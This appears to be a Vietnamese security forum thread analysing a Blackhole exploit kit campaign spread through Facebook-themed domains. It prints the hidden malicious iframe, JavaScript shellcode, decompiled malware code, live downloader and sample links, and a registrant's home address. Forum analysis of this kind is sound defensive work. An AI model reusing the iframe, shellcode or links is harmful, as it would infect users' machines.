<iframe src="http://fb-sv10.co.uk/main.php?page=95fc4549d83b0486" width="0" height="0"></iframe> <meta HTTP-EQUIV="REFRESH" content="5; url=http://facebook.com/"> 

function getShellCode() {
        return "%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u57e9%u80fe%u2830%ue240%uebfa%ue805
%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b
%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c
%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469
%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376
%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71
%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7
%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3
%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7
%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e
%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835
%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969
%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b
%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e
%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732
%u4058%u5c5c%u1258%u0707%u4a4e%u5b05%u195e%u0618%u474b%u5d06%u0743%u065f%u4058%u1758%u154e%u184b%u4b19%u0e1d%u154d%u2819%u0028";
    }

䅁䅁荦ﳤ堐줱腦埩胾⠰￫￿청ᱝ矁ꍌᡨ梣ꌤ㑘ꍾ⁞ꍎᑶ尫Л용㠽ퟗꎐᡨ滫⸑퍝Ჯ괌巌셹擃繹嶣ꌔᵜ⭐绝庣⬈ᯝ懡푩⮅ᯭ⟳
㢖�⁜⬥棲�㜓칝ꍶ౶ꍎ挤溥ퟄ౼ꌤ⯰ꏵꌬ皃篃ꎅࡀ喨ᬤ⭜쎾ꏛ⁀�ⵂ쁱ힰퟗ퇊⣀⠨瀨䉸䁨⣗⠨ꭸ㇨絸쒣皣ꬸⷫ쯗䝀⡆䀨婝䕄흼ꬾ⃬
삣䧀ퟗ쏗쌪꥚Ⳅ⠩ꔨ౴బ䵚孏泯Ⰼ婞ᨛ泯‌Ԉ࡛䁻⣐⠨绗ꌤᯀ秡泯⠵塟届泯ⴵ䰆䑄泮ℵ焨ᠬ沠ⰵ祩⡂⡂罻⡂绗괼巨䈾笨绗䈬ꬨⓃ흻
Ȿ쌤쌪漻ឨ崨濒ឨ崨䋬䈨ퟖ⁾듀ퟖꛗ♦냄ꋖꄦ⥇ᮕꋢ㍳滮ṑܲ䁘屜ቘ܇䩎嬅ᥞؘ䝋崆ٟ݃䁘᝘ᕎᡋ䬙ฝᕍ⠙(

Hì hì, có TQN say xỉn này liền anh. Nói ông anh anh chửi, vạch mặt thằng đó đi. Định chơi JavaScript exploit à ? Exploit đó tên JS/Exploit-Blacole.al. Bà con google ra thì thấy. Kết quả phân tích file .php đó đây (nhờ máy làm cho khoẻ cho rồi): http://wepawet.cs.ucsb.edu/view.php?hash=236c22c7ba122ba97cee01ee04017968&type=js loài ra một con downloader: http://fb-sv10.co.uk/w.php?f=c01c5&e=1, được download về %Temp% dir với tên: wpbt0.dll. Em đã chụp được em nó, đang unpack, nhưng giờ phải đi rồi. Anh nói anh anh cô lập máy ngay, ngắt Internet ngay. Tạm thời tháo cất cái ổ cứng đó đi. Nguy hiểm. KAV 2011 của em không phát hiện ra virus trong file main.php và wpbt0.dll. Nay lại lòi ra thêm cái trò comment trên FB = link exploit Integer Overflow của Firefox, browser nữa à ! Kinh thật, đúng là quá lỳ lợm, = mọi giá ! 

void EntryPoint(void) {
        asm{ push       ebp };
        temp_0 = rbp;
        rbp = rsp;
        var_m8 = 0xdf2efc3;
        *0x40b01c = 0x2bb;
        if (*0x40c41c != 0x2d3c4f52) {

            loc_4027c6:
                asm{ adc        dword [ds:0x408774], 0x40CAA9 };
                *0x408770 = *0x408770 - 0x1c1d;
                var_m4 = &var_m12;
                *0x40b0b0 = *0x40b0b0 & 0x78e9;
                *0x40c31c = &var_4;
                *0x408774 = *0x408774 & 0x0;
                goto loc_40280c;
        }

    loc_4027b2:
        *0x408768 = *0x408768 | 0x40b070;
        *0x40c41c = 0x0;
        goto loc_4027c6;

    loc_40280c:
        if (!CARRY(*0x408774 - 0x18)) {
                rax = *0x40c320;
                if (*0x40c320 != 0x0) {

                    loc_402873:
                        *0x40ca9d = *0x40ca9d & 0x0;
                        goto loc_402890;
                }
                rax = 0x0;
                rax = rax + *0x40b07c;
                *0x408760 = *0x408760 + rax + CARRY(rax + *0x40b07c);
                *0x40b0ac = *0x40b0ac | 0x467;
                *0x40c320 = **0x40c31c;
                goto loc_402873;
        }
        if (*0x408774 != 0x1d) {
                goto loc_402801;
        }
        asm{ push       dword [ss:ebp-0x0+var_m12] };
        asm{ push       0x6A1C };
        asm{ push       dword [ss:ebp-0x0+var_m12] };
        asm{ call       dword [ds:imp_VerifyVersionInfoW] };
        __FCT_PARAMETER__[0] = var_m12;
        __FCT_PARAMETER__[1] = 0x6a1c;
        __FCT_PARAMETER__[2] = var_m12;

    loc_402801:
        *0x408774 = *0x408774 + 0x1;
        goto loc_40280c;

    loc_402890:
        if (!CARRY(*0x40ca9d - 0x1b)) {
                asm{ sbb        dword [ds:0x40B074], 0x40B07C };
                *0x40c310 = *(*0x40c31c + 0x4);
                *0x40c314 = *(*0x40c31c + 0x8);
                *0x40c318 = *(*0x40c31c + 0xc);
                *0x40c2e0 = *0x40c310;
                *0x40c2e8 = *0x40c318;
                *0x40c2e4 = *0x40c314;
                *0x40c1b0 = 0x40c038;
                *0x40c2ec = var_m4;
                rax = fct_4029ad();
                *var_m4 = **0x40c2ec;
                var_m8 = 0x0;
                if (*0x40c230 != var_m8) {
                        *0x40c228 = *0x40c228 ^ *0x40c230;
                        *0x40c230 = var_m8;
                        **0x40c31c = **0x40c31c + *0x40c228;
                        return;
                }
                else {
                        *0x40c228 = *0x40c230;
                        **0x40c31c = *0x40c320;
                        return;
                }
        }
        else {

            loc_40289d:
                if (*0x40ca9d != 0x6) {

                    loc_4028ba:
                        if (*0x40ca9d != 0x5) {
                                goto loc_402882;
                        }
                        *0x40ca9d = *0x40ca9d + 0x1;
                        goto loc_402882;
                }
                asm{ push       0x37DF };
                asm{ push       0x7323 };
                asm{ call       dword [ds:imp_GetCommProperties] };
                __FCT_PARAMETER__[0] = 0x7323;
                __FCT_PARAMETER__[1] = 0x37df;
                goto loc_4028ba;
        }
        goto loc_40289d;

    loc_402882:
        rax = rax + 0x1;
        *0x40ca9d = rax;
        goto loc_402890;
}

Dà, giờ em đi làm rồi, tính về nhà nghỉ một chút mà mấy anh đấy lại làm em mất giấc ngủ trưa rồi. Tội tụi em quá mấy anh. Mấy anh cứ quậy suốt vầy không chán sao. Lòi cái nào ra bị thì bị chụp cái đó mà. Em cũng ngán mấy anh tới tận cổ rồi. Cái wrap đó không phải là code thực đâu anh conmale. Nghi binh bên ngoài đó, phải debug, trace vào thật sâu mới lòi ra code VC++ của mấy anh "người quen mà chưa bao giờ gặp" này. 

Forbidden You don't have permission to access /facebook/ on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. 

Dà, giờ em đi làm rồi, tính về nhà nghỉ một chút mà mấy anh đấy lại làm em mất giấc ngủ trưa rồi. Tội tụi em quá mấy anh. Mấy anh cứ quậy suốt vầy không chán sao. Lòi cái nào ra bị thì bị chụp cái đó mà. Em cũng ngán mấy anh tới tận cổ rồi. Cái wrap đó không phải là code thực đâu anh conmale. Nghi binh bên ngoài đó, phải debug, trace vào thật sâu mới lòi ra code VC++ của mấy anh "người quen mà chưa bao giờ gặp" này. 

Em không tải được file wpbt0.dll, KIS 2012 nó chặn địa chỉ này, tắt KIS dow từ http://fb-sv10.co.uk/w.php?f=c01c5&e=1 được 1 file info.exe file này hình như code bằng Delphi, không biết đang chơi trò gì nữa, không lẽ có random nứa sao. File ở đây: http://www.mediafire.com/?wt99t6vpk39kasz Pass là: malware 

Good job onlyida. Cậu hảy mô tả sơ sơ quá trình unpack để lấy được PE nhúng trong info.exe cho bà con biết.  

Sao đợt này code phức tạp, mã hoá, obfuscated tùm lum vầy nè. Em có lộn không, sao lại thấy có mùi code cao cấp của hacker Nga trong đây. Chiều giờ nó quần em đuối luôn, sinh EXE trong bộ nhớ và harddisk tá lã, rồi xài code inject để download nữa. Mà lạ là cái máy cùi ngoài xưỡng em, cài MS Essential lại bắt hết. Rầu, nhanh thiệt, mấy anh lại ngồi túc trực HVA này, em wget http://fb-sv10.co.uk/w.php?f=c01c5&e=1 không được, mấy anh chơi xoá mất tiêu rầu. Mới chưa được 2 tiếng đồng hồ. Em lại sơ ý để MS AV xoá mất tiêu file wpbt0.dll nữa rồi. Bà con ai down kịp share lại giúp em cái ! Ngày mai em làm tiếp, làm cho ra. Giờ thì em út gọi đi nhậu mới chết, nói: em làm mồi nhậu cho anh nè, nhớ anh quá. Theo bà con thì ngồi RCE hay đi nhậu đây ? 

Em không tải được file wpbt0.dll, KIS 2012 nó chặn địa chỉ này, tắt KIS dow từ http://fb-sv10.co.uk/w.php?f=c01c5&e=1 được 1 file info.exe file này hình như code bằng Delphi, không biết đang chơi trò gì nữa, không lẽ có random nứa sao. File ở đây: http://www.mediafire.com/?wt99t6vpk39kasz Pass là: malware 

Hay là hacker Nga, TQ, VN share nhau kỹ thuật đây ? 

TQN wrote:

Hay là hacker Nga, TQ, VN share nhau kỹ thuật đây ? 

:-/ để ý thì thấy anh em với nhau cả 

Quân ta bây giờ cũng đông, thiện chiến không kém gì mấy anh em kia rồi. Ha ha, say rồi, nói đùa vài câu cho vui. Giờ thì em đã yên tâm gác kiếm ! 

Registrant: Annette Kathleen Fisher Registrant type: UK Individual Registrant's address: 183 Albion Way Verwood Dorset BH31 7LT United Kingdom Registrar: Fasthosts Internet Ltd [Tag = LIVEDOMAINS] URL: http://www.fasthosts.co.uk 

fb-sv07.co.uk Port 22: SSH-2.0-OpenSSH_5.3 Port 80: nginx/0.8.54 ---> http://fb-sv07.co.uk/installation/index.php ;-) fb-sv09.co.uk Port 22: SSH-2.0-OpenSSH_5.1p1 Debian-5 Port 80: Server: nginx/0.6.32 fb-sv10.co.uk Port 22: SSH-2.0-OpenSSH_5.4p1_hpn13v11 FreeBSD-20100308 Port 25: 220 alexander2kupalo.ru ESMTP Sendmail 8.14.5/8.14.5; Sat, 14 Apr 2012 05:51:09 GMT Port 80: Server: nginx/1.1.18  

fb-sv07.co.uk (83.69.226.219) LTD AWAX Telecom Moscow, Orlovo-Davydovsky per., 2/5 str 129110 Moscow, Russia +7 495 6264747 +7 495 6264747 fb-sv10.co.uk (79.137.213.115) Digital Network NOC 13a, Yaroslavskaya st., Moscow, Russia, 129366 +7 495 660 8383 +7 495 660 8383 fb-sv02.com (146.185.249.34) Petersburg Internet Network ltd. PIN ROLE Russia, SPb, Sedova 80  

http://google.com/safebrowsing/diagnostic?site=zaminnews.com/ Malicious software is hosted on 5 domain(s), including fb-sv06.co.uk/, fb-sv04.co.uk/, fb-sv02.com/. 1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including fb-sv02.com/ http://google.com/safebrowsing/diagnostic?site=eccie.net/ Malicious software includes 35 trojan(s), 31 scripting exploit(s). Successful infection resulted in an average of 7 new process(es) on the target machine. Malicious software is hosted on 3 domain(s), including nl.ai/, update-kb18628311.com/, fb-sv03.co.uk/. http://google.com/safebrowsing/diagnostic?site=update-kb18628311.com/ Malicious software includes 92 trojan(s), 48 scripting exploit(s).  

CVE-2006-0003 MS06-014 for lE6/Microsoft Data Access Components (MDAC) Remote Code Execution CVE-2007-5659/2008-0655 PDF Exploit -collab, collectEmaillnfo CVE-2008-2992 PDF Exploit• util.printf CVE-2009-0927 PDF Exploit- collab.getlcon CVE-2010-0188 PDF Exploit - LibTiff Integer Overflow CVE-2010-0842 JAVA MIDI Java OBE Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 CVE-2010-1885 Help Center URL Validation Vulnerability CVE-2011-0559 Flash 10 by exm Denial of service (memory corruption) via crafted parameters CVE-2011-3544 Vulnerability in the Rhino Script Engine CVE-2012-0507 Java Atomic CVE-2010-0840 JAVA TC (?) javagetval OBE Java invoke / Java Trust Trusted Method Chaining - Java getValue Remote Code Execution CVE-2010-0886 Java SMB / Java JDT in Oracle Java SE and Java for Business JDK and JRE 6 Upd 10-19 * Requires xtra components CVE-2010-3552 JAVA SKYLINE Unspecified vulnerability in the New Java Plug-in – Java 6 < Update 22 – IE Only – ALL Windows 

1,500 usd/1 năm 1,000 usd/6 tháng 700 usd/3 tháng 

Danh sách các Exploit Kit và CVE: http://www.mediafire.com/?vwizwswtwx9p1q3 Deconstructing the Black Hole Exploit Kit http://blog.imperva.com/2011/12/deconstructing-the-black-hole-exploit-kit.html Blackhole 1.2.3 released http://xylibox.blogspot.com/2012/03/blackhole-v123.html ...in config.php change value of 'ExploitsDir' to 'data'(old value was 'content'). 

bannersintpro.org/files/97d19 ligaworldtraders.org/files/97d19 perskitest.org/files/97d19 tartcompanyltd.com/files/97d19  

After this it injects its code inside all the processes it could get access. In every infected process it hooks the following Windows APIs: CryptEncrypt,LdrLoadDll,NtEnumerateValueKey,NtQueryDirectoryFile,NtResumeThread,NtVdmControl This allows the trojan to hide its folder and its registry key from the user's eyes and antivirus software, implementing user mode rootkit techniques. Inside browser processes, the trojan hooks even the following APIs: TranslateMessage,send,HttpSendRequestA,HttpSendRequestW,InternetCloseHandle By doing so, it's able to steal all sensitive data going out through the browser session, even SSL encrypted web pages. Using this technique it is even able to conceptually bypass classic anti-keyloggers that encrypt keystrokes.